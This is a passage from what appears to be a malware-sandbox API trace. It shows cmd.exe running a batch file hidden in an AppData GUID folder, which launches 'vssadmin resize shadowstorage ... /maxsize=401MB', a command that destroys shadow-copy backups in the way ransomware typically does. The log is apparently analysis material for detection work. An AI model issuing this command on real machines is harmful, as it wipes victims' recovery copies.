SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0035.205] GetProcessHeap () returned 0x3e0000 [0035.205] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.205] GetEnvironmentStringsW () returned 0x3f8408* [0035.205] GetProcessHeap () returned 0x3e0000 [0035.205] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.205] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.205] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0035.205] GetProcessHeap () returned 0x3e0000 [0035.205] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.205] GetEnvironmentStringsW () returned 0x3f8408* [0035.205] GetProcessHeap () returned 0x3e0000 [0035.205] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.205] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.206] GetProcessHeap () returned 0x3e0000 [0035.206] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0035.206] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0035.206] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.206] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0035.206] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.206] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0035.206] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.206] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0035.206] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.206] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0035.206] SetConsoleInputExeNameW () returned 0x1 [0035.206] GetConsoleOutputCP () returned 0x1b5 [0035.207] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0035.207] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.207] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0035.207] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0035.207] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.207] SetFilePointer (in: hFile=0x78, lDistanceToMove=137, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x89 [0035.207] GetProcessHeap () returned 0x3e0000 [0035.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7540 | out: hHeap=0x3e0000) returned 1 [0035.207] GetProcessHeap () returned 0x3e0000 [0035.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7410 | out: hHeap=0x3e0000) returned 1 [0035.207] GetProcessHeap () returned 0x3e0000 [0035.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72e8 | out: hHeap=0x3e0000) returned 1 [0035.207] GetProcessHeap () returned 0x3e0000 [0035.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4280 | out: hHeap=0x3e0000) returned 1 [0035.207] GetProcessHeap () returned 0x3e0000 [0035.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7250 | out: hHeap=0x3e0000) returned 1 [0035.207] GetProcessHeap () returned 0x3e0000 [0035.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7038 | out: hHeap=0x3e0000) returned 1 [0035.207] GetProcessHeap () returned 0x3e0000 [0035.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0035.207] GetProcessHeap () returned 0x3e0000 [0035.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0035.207] GetProcessHeap () returned 0x3e0000 [0035.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0035.208] GetProcessHeap () returned 0x3e0000 [0035.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0035.208] GetProcessHeap () returned 0x3e0000 [0035.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f0ee0 | out: hHeap=0x3e0000) returned 1 [0035.208] GetProcessHeap () returned 0x3e0000 [0035.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0035.208] GetProcessHeap () returned 0x3e0000 [0035.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0035.208] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.208] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x89 [0035.208] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1838, lpOverlapped=0x0) returned 1 [0035.208] SetFilePointer (in: hFile=0x78, lDistanceToMove=198, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc6 [0035.208] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=61, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\r\ned\r\n") returned 61 [0035.208] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.208] GetFileType (hFile=0x78) returned 0x1 [0035.208] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.208] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc6 [0035.208] GetProcessHeap () returned 0x3e0000 [0035.208] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f9ad8 [0035.208] GetProcessHeap () returned 0x3e0000 [0035.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9ad8 | out: hHeap=0x3e0000) returned 1 [0035.208] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f81f8 [0035.208] GetProcessHeap () returned 0x3e0000 [0035.208] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0035.209] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x70) returned 0x3f8258 [0035.209] _tell (_FileHandle=3) returned 198 [0035.209] _close (_FileHandle=3) returned 0 [0035.209] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0035.209] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0035.209] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0035.209] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0035.209] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0035.209] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0035.209] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0035.209] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0035.209] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0035.209] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0035.209] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0035.209] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0035.210] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0035.210] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0035.210] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0035.210] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0035.210] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0035.210] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0035.210] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0035.210] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0035.210] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0035.210] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0035.210] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0035.210] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0035.210] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0035.210] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0035.210] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0035.210] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0035.210] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0035.210] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0035.210] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0035.210] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0035.210] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0035.210] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0035.210] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0035.210] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0035.210] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0035.210] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0035.210] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0035.210] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0035.210] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0035.210] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0035.210] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0035.210] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0035.210] SetErrorMode (uMode=0x0) returned 0x1 [0035.211] GetProcessHeap () returned 0x3e0000 [0035.211] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0035.211] GetProcessHeap () returned 0x3e0000 [0035.211] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0035.211] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.211] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.211] GetProcessHeap () returned 0x3e0000 [0035.211] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0035.211] GetProcessHeap () returned 0x3e0000 [0035.211] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0035.211] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0035.211] GetProcessHeap () returned 0x3e0000 [0035.211] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0035.211] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.211] GetProcessHeap () returned 0x3e0000 [0035.211] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f6fb8 [0035.211] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6fb8, Size=0x76) returned 0x3f6fb8 [0035.211] GetProcessHeap () returned 0x3e0000 [0035.211] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6fb8) returned 0x76 [0035.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.211] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.211] GetLastError () returned 0x2 [0035.211] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.212] GetLastError () returned 0x2 [0035.212] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.212] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f7038 [0035.212] FindClose (in: hFindFile=0x3f7038 | out: hFindFile=0x3f7038) returned 1 [0035.212] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.213] GetLastError () returned 0x2 [0035.213] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f7038 [0035.213] FindClose (in: hFindFile=0x3f7038 | out: hFindFile=0x3f7038) returned 1 [0035.213] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.213] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.213] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.213] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f7038 [0035.213] GetProcessHeap () returned 0x3e0000 [0035.213] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x82) returned 0x3f7250 [0035.213] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f4280 [0035.213] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f4288, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0035.213] SetErrorMode (uMode=0x0) returned 0x1 [0035.213] GetProcessHeap () returned 0x3e0000 [0035.213] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4280, Size=0x66) returned 0x3f4280 [0035.213] GetProcessHeap () returned 0x3e0000 [0035.213] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4280) returned 0x66 [0035.213] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.213] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.213] GetProcessHeap () returned 0x3e0000 [0035.213] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72e0 [0035.213] GetProcessHeap () returned 0x3e0000 [0035.213] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7408 [0035.214] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7408, Size=0x122) returned 0x3f7408 [0035.214] GetProcessHeap () returned 0x3e0000 [0035.214] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7408) returned 0x122 [0035.214] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.214] GetProcessHeap () returned 0x3e0000 [0035.214] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7538 [0035.214] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7538, Size=0x76) returned 0x3f7538 [0035.214] GetProcessHeap () returned 0x3e0000 [0035.214] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7538) returned 0x76 [0035.214] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.214] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.214] GetLastError () returned 0x2 [0035.214] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.214] GetLastError () returned 0x2 [0035.214] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.214] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f75b8 [0035.214] FindClose (in: hFindFile=0x3f75b8 | out: hFindFile=0x3f75b8) returned 1 [0035.214] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.215] GetLastError () returned 0x2 [0035.215] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f75b8 [0035.215] FindClose (in: hFindFile=0x3f75b8 | out: hFindFile=0x3f75b8) returned 1 [0035.215] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.215] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.215] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.215] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0035.215] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0035.215] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0035.215] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.215] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.216] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.216] GetProcessHeap () returned 0x3e0000 [0035.216] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0035.216] GetProcessHeap () returned 0x3e0000 [0035.216] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0035.216] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.216] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x9f8, dwThreadId=0x9fc)) returned 1 [0035.220] CloseHandle (hObject=0x78) returned 1 [0035.220] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.220] GetProcessHeap () returned 0x3e0000 [0035.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.220] GetEnvironmentStringsW () returned 0x3f8408* [0035.221] GetProcessHeap () returned 0x3e0000 [0035.221] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.221] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.221] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0035.344] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0035.344] CloseHandle (hObject=0x74) returned 1 [0035.345] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0035.345] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0035.345] GetProcessHeap () returned 0x3e0000 [0035.345] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.345] GetEnvironmentStringsW () returned 0x3f8408* [0035.345] GetProcessHeap () returned 0x3e0000 [0035.345] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.345] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.345] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0035.345] GetProcessHeap () returned 0x3e0000 [0035.345] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.345] GetEnvironmentStringsW () returned 0x3f8408* [0035.345] GetProcessHeap () returned 0x3e0000 [0035.345] RtlAllocateHeap (HeapHandle=0x3e0000, 